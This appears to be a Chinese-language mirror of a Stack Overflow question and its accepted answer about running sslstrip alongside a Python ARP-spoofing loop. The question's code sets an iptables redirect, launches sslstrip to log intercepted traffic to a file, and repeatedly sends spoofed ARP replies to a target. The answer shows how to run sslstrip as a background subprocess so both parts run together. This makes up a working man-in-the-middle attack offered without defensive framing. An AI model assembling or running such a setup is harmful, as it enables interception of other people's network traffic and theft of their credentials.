我已经编写了一个执行arpspoofing的程序,现在我想在继续发送arp重放的同时调用sslstrip。

我不确定这是否可以更好地与线程配合使用,或者如何配合,我只是想知道什么是最简单的解决方案。

这是我尝试过的并且无法发送arp重播(卡在sslstrip进程中):

os.system("iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000")

os.system("sslstrip -l 1000 -w cap.txt")


while True:
    try:
        time.sleep(2)
        print 'Injecting Arp Replay to '+target+' telling '+host+' is at '+mac
        s.send(packet)

    except KeyboardInterrupt:
        print "bye"
        os.system("iptables -t nat -D PREROUTING 1 ")
        sys.exit(1)


有谁知道如何轻松解决问题?

最佳答案

您可以使用subprocess module代替os.system

您可以将sslstrip作为后台任务打开,并在脚本末尾终止它:

import subprocess
sslstrip = subprocess.Popen(["sslstrip", "-l", "1000", "-w", "cap.txt"], stdout=subprocess.PIPE)

# Run your script
# ...

# At the end terminate the process (in your KeyboardInterrput)
sslstrip.terminate()

关于python - python运行2个进程,我们在Stack Overflow上找到一个类似的问题:https://stackoverflow.com/questions/28579272/

10-12 00:49